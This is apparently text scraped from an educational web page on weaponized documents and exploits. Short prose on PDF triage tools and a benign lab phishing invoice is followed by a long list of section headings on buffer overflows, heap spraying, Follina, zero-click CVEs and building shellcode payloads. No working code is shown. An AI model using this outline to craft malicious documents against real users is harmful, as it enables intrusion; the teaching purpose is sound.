🔍 Analyst Tools (Layer 3)

pdfid.py: Quick triage — counts suspicious keywords. Zero /JS, /Launch, /OpenAction = low risk. Try it on your generated PDF!

pdf-parser.py: Deep dive — dumps every object, decodes streams, follows references. Shows the full object tree.

peepdf: Interactive analysis — JavaScript extraction, shellcode detection, object graph visualization.

Online Sandboxes: Upload to any.run, hybrid-analysis.com, or VirusTotal to see multi-engine detection results.

⚡ Why Your PDF Passes All Checks

No executable code: Zero JavaScript, no embedded executables, no launch actions.

Transparent link: A visible /URI pointing to a known-good domain. Users choose to click; nothing auto-executes.

Clean structure: Minimal PDF objects — page, font, text streams, one annotation. No obfuscation, no encoded streams hiding payloads.

Social engineering only: The "attack" is the convincing design and the call-to-action. This is why human awareness training is essential — technology can't flag a well-crafted invoice with a legitimate link.

🎯 Key Takeaway — Your lab PDF proves that a benign document can be extremely convincing. The difference between this and a real attack is structural — adding /JavaScript, /Launch, or /OpenAction entries turns a normal PDF into a weapon. Security tools focus on these structural markers, but social engineering with clean documents remains the hardest attack to detect. This is why user training, not just technology, is critical.

What Are Exploits?

One-Click Exploits

Zero-Click Exploits

Document Exploits

Exploit Chains

Calculations Behind Every Exploit

Hexadecimal — The Hacker's Number System

The Buffer Overflow — Calculated Byte by Byte

The Vulnerable C Code — Where the Bug Lives

The Exploit Tool — Python Precision

Converting a URL to Shellcode Hex

Heap Spray — The Memory Math

PDF Structure — Object Numbers & Cross-Reference Math

🔢 Exploit Math Calculator — Try It Live

From Document to Full Compromise

Invisible Intrusions

How They Work — The Technical Flow

Notable Zero-Click Attacks — Case Studies

WhatsApp VoIP — CVE-2019-3568

Samsung Qmage — CVE-2020-8899

FORCEDENTRY — CVE-2021-30860

BLASTPASS — CVE-2023-41064

Weaponized Documents

The Major Attack Surfaces

VBA Macros

OLE Objects

Remote Templates

DDE / Field Codes

Equation Editor (CVE-2017-11882)

Follina (CVE-2022-30190)

MotW Bypass (ISO/IMG Containers)

OneNote Attacks (.one Files)

Document Exploit: Anatomy — The Full Attack Flow

Follina Deep Dive (CVE-2022-30190) — Complete Technical Breakdown

Inside a PDF Exploit

Clean vs. Exploited — Raw "Notepad" View

How Each Exploit Type Works Internally

PDF JavaScript Execution

Heap Spraying — Filling Memory with Malice

Before the Spray — Normal Memory Layout

After the Spray — Attacker Controls the Heap

RTF (Rich Text Format) Exploits

OLE Object Embedding

PDF Exploit Lifecycle — From Open to Owned

The Complete Weaponized PDF — Annotated Line by Line

The JavaScript Heap Spray — Step by Step

🔬 Exploit Workshop — Build Every Component Step by Step

📊 Stack Memory — Before vs After Overflow

📝 Before vs After — How This Tag Changed the PDF

🔐 Encoded / Obfuscated Version (what hackers actually embed)

🏷️ All Generated Malicious Tags (for reference / checking)

🧮 The Math — Byte Offset Calculations

👁️ What The User Sees — Both PDFs Rendered

INVOICE #2024-0582

🕵️ What The Hacker Actually Wrote — the real code hidden inside your "invoice"

⚡ Generated Exploit Code — Full Chain

🏷️ Injected Techniques

How Attackers Build an Exploit

Write the Shellcode in Assembly x86 ASM

Assemble to Machine Opcodes Opcodes

Encode as Hex / URL / Unicode Encoding

🔄 Try It: Hex Encoder — Build a Payload and See It Inside a PDF

📄 Live Preview: How Encoded Data Appears Inside a PDF

Craft the Overflow — Junk + EIP + NOP + Shellcode Overflow

The Stack Before Overflow

The Stack After Overflow (Attacker's Payload)

Assemble the Full Payload Python

Inject Payload into a PDF Document Python PDF

Victim Opens the PDF — The Kill Chain Execution

The Complete Exploit Buffer — Annotated

🔧 Interactive: Full Pipeline Generator

📐 Modern Exploitation: 64-bit & Mitigation Bypasses

Notable Exploit CVEs

Detailed CVE Breakdowns

CVE-2017-0199 — HTA Handler (Microsoft Office)

CVE-2017-11882 — Equation Editor Buffer Overflow

CVE-2019-3568 — WhatsApp VoIP Buffer Overflow